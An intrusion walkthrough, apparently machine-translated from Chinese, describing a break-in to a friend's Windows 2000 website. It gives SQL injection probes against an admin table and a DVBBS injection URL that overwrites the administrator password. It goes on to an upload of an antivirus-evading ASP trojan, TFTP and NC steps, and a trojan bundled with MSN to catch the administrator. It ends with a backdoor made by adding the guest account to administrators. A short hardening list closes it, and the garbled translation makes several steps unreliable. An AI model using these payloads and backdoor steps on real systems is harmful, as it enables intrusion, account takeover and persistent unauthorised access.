Helping a friend test the whole process of Website Security penetration intrusion

My friend gave me a website that showed me its security. I opened the URL and looked at it roughly. It is estimated that it is 2000 of the system (why? See asp ). Then scan it with a X-SCAN, a vulnerability does not (including WEBDAVX and DRPC) is estimated to be playing the SP4 plus DRPC patch, the only good news is that many [139.445.135.80] ports are opened. It seems that there is no port filter or no firewall is installed, or it is a honeypot ^_^.

On the homepage, we can see a news publishing system. We can add a 1 = 1 1 = 2 to the back. From the returned information, we can see the SQL INJECTION vulnerability. First, check the table as follows:
0 <> (select % 20 count (*) % 20 from % 20 admin)
0 <> (select % 20 count (*) % 20 from % 20 admin % 20 where % 20 username % 20 <>)
0 <> (select % 20 count (*) % 20 from % 20 admin % 20 where % 20 passwd % 20 <>)
Haha, it is a common table. I can see from the foreground that the Administrator's username is root.
Submit as follows:
Root = (select % 20 username % 20 from % 20 admin % 20 where % 20len (passwd) = 8)
Display Error and submit again:
Root = (select % 20 username % 20 from % 20 admin % 20 where % 20len (passwd) = 16)
Displayed successfully
When it comes to getting depressed, the password must be encrypted with 16 bits, that is, the one-bit guess is useless. just give up and guess.

[Tips: You can try or when performing cross-Table subqueries. For example, if your first condition is false, the effect of using or is displayed. For example:
0 or 1 = 1 returns the original page
0 or 0 = 0 prompt that the database cannot find the information]

Let's take a look at what is useful on this website. We have a mobile network forum. You have read PSKEY's book "smile behind the absolute scenes-let's talk about the DVBBS vulnerability, construct a membername request logout in the cookie. asp to guess the password. Then run exploit to get the username. ID and MD5 value of the admin Login background of the foreground administrator. Use the COOKIE modifier to modify the COOKIE and close the current window. When I open a new page to access the forum, I am already an administrator. Submit admin_recycle.asp? Action = restore & topicid = % 20 where % 20id % 20in % 20 (9 & tablename = admin % 20 set % 20 [password] = ef7813118e77b0ee, lastloginip = bbs
Change the password of the background administrator. Now, you can go to the background ~~~. After logging in, change the upload settings. upload an ASP Trojan, aspcmd. asp.

[I have encrypted aspcmd. asp with screnc and won't be killed. By the way, NORTON encrypts the asp Trojan xp.net on the top of Haiyang. rising cannot find the virus, but KV2004 can find it. It is estimated that the virus code identified by KV2004 is a string of Chinese characters. Which of the following statements can tell me?]

Run the command, OK, and get a WEB
SHELL. I originally wanted to use the NC bounce connection, but after uploading, the DIR was not seen. It is estimated that it was killed by anti-virus software and then TFTP.
-I IP GET
Pull IDQ. DLL and COPY it to the SCRIPTS directory (this is an administrator error and the directory permission is not set)
I thought the GAME was OVER. NET USER MM
/ADD: Access denied. If you have insufficient permissions, you can replace the self-starting program or service on the server. Check the system services and find that there is no [permission issue] to be used, and then upload a REG
Query:
Reg query
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
Access denied.

It seems that there is no way. I can find something on the Internet to improve the 2 K [SP4] permission. Prepare to let it go. I am bored to use DIR to view some directories on the hard disk. Suddenly I found an interesting Directory D: Program.
FilesMSN
On the terminal. Download MSNCOPY to the WEB directory and package it with the modified glaciers before uploading. Wait for the Administrator to use MSN
A few days later, I used my glacier client to: OK, GAME OVER

First CA, use VBS to leave a backdoor that does not die for the Account to put net user guest ***/add net
Localgroup administrators/add
~~~ In the registry, HKEY_LOCAL_MACHINESOFTWAREMicrosoftCommand
Processor imports the VBS directory
Summary of this intrusion:
1: The directory permission settings are poor.
2: FSO is not renamed or DEL
3: No port filtering or firewall is performed.
4: it is best not to use some non-essential software on the server, such as MSN/QQ
5: The system patch is the latest, and other application software on the server must be the latest.